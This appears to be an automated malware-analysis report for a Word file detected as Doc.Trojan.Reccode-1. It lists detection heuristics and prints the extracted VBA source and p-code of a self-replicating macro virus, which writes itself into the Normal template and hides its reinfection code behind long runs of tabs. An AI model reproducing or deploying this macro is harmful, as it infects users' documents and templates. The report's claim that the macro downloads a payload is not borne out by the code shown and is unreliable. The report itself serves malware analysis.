MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The macro attempts to deobfuscate and execute code, likely to download and run a secondary payload. The ClamAV detection of 'Doc.Trojan.Reccode-1' further supports its malicious nature.
Heuristics 3
-
ClamAV: Doc.Trojan.Reccode-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Reccode-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4660 bytes |
SHA-256: 9fba49eff5978058ae28a2024e0673f7e76afaf3e062962bb0fd4c7a6d9b44c3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim NTmp As Object
Set NTmp = Normal.ThisDocument
Dim Adc As Object
Set Adc = Project.ThisDocument
Dim TDc As Object
Set TDc = ThisDocument
Set AC = Adc.VBProject.VBComponents(1).CodeModule
Set NC = NTmp.VBProject.VBComponents(1).CodeModule
Set TD = TDc.VBProject.VBComponents(1).CodeModule
NTmp.Variables("RecCode").Value = TD.Lines(1, TD.CountOfLines)
Adc.Variables("RecCode").Value = TD.Lines(1, TD.CountOfLines)
UnstealthA = "With ThisDo" & "cument.VBPr" & "oject." & "VBCompo" & "nents(1" & ").CodeModule: "
UnstealthB = ".DeleteL" & "ines 1" & ", .CountO" & "fLines: "
UnStealthC = ".InsertLin" & "es 1, T" & "hisDo" & "cument.Variab" & "les(1)" & ".Value: "
UnStealthD = "End With"
UnStealth = String(175, Chr(9)) & "If ShowVisualBasicEditor = True Then Exit Sub: " & UnstealthA & UnstealthB & UnStealthC & UnStealthD
NC.DeleteLines 1, NC.CountOfLines: NC.InsertLines 1, "Private Sub Document_Close" & Chr(13) & UnStealth & Chr(13) & "End Sub"
AC.DeleteLines 1, AC.CountOfLines: AC.InsertLines 1, "Private Sub Document_Close" & Chr(13) & UnStealth & Chr(13) & "End Sub"
End Sub
' Processing file: /opt/analyzer/scan_staging/b2095bf0965b4098a9de21d300997fea.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5879 bytes
' Line #0:
' FuncDefn (Private Sub Document_Open())
' Line #1:
' Dim
' VarDefn NTmp (As Object)
' Line #2:
' SetStmt
' Ld Normal
' MemLd ThisDocument
' Set NTmp
' Line #3:
' Dim
' VarDefn Adc (As Object)
' Line #4:
' SetStmt
' Ld Project
' MemLd ThisDocument
' Set Adc
' Line #5:
' Dim
' VarDefn TDc (As Object)
' Line #6:
' SetStmt
' Ld ThisDocument
' Set TDc
' Line #7:
' SetStmt
' LitDI2 0x0001
' Ld Adc
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' Set AC
' Line #8:
' SetStmt
' LitDI2 0x0001
' Ld NTmp
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' Set NC
' Line #9:
' SetStmt
' LitDI2 0x0001
' Ld TDc
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' Set TD
' Line #10:
' LitDI2 0x0001
' Ld TD
' MemLd CountOfLines
' Ld TD
' ArgsMemLd Lines 0x0002
' LitStr 0x0007 "RecCode"
' Ld NTmp
' ArgsMemLd Variables 0x0001
' MemSt Value
' Line #11:
' LitDI2 0x0001
' Ld TD
' MemLd CountOfLines
' Ld TD
' ArgsMemLd Lines 0x0002
' LitStr 0x0007 "RecCode"
' Ld Adc
' ArgsMemLd Variables 0x0001
' MemSt Value
' Line #12:
' LitStr 0x000B "With ThisDo"
' LitStr 0x000B "cument.VBPr"
' Concat
' LitStr 0x0006 "oject."
' Concat
' LitStr 0x0007 "VBCompo"
' Concat
' LitStr 0x0007 "nents(1"
' Concat
' LitStr 0x000E ").CodeModule: "
' Concat
' St UnstealthA
' Line #13:
' LitStr 0x0008 ".DeleteL"
' LitStr 0x0006 "ines 1"
' Concat
' LitStr 0x0009 ", .CountO"
' Concat
' LitStr 0x0008 "fLines: "
' Concat
' St UnstealthB
' Line #14:
' LitStr 0x000A ".InsertLin"
' LitStr 0x0007 "es 1, T"
' Concat
' LitStr 0x0005 "hisDo"
' Concat
' LitStr 0x000D "cument.Variab"
' Concat
' LitStr 0x0006 "les(1)"
' Concat
' LitStr 0x0008 ".Value: "
' Concat
' St UnStealthC
' Line #15:
' LitStr 0x0008 "End With"
' St UnStealthD
' Line #16:
' LitDI2 0x00AF
' LitDI2 0x0009
' ArgsLd Chr 0x0001
' ArgsLd String$ 0x0002
' LitStr 0x002F "If ShowVisualBasicEditor = True Then Exit Sub: "
' Concat
' Ld UnstealthA
' Concat
' Ld UnstealthB
' Concat
' Ld UnStealthC
' Concat
' Ld UnStealthD
' Concat
' St UnStealth
' Line #17:
' LitDI2 0x0001
' Ld NC
' MemLd CountOfLines
' Ld NC
' ArgsMemCall DeleteLines 0x0002
' BoS 0x0000
' LitDI2 0x0001
' LitStr 0x001A "Private Sub Document_Close"
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' Ld UnStealth
' Co
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.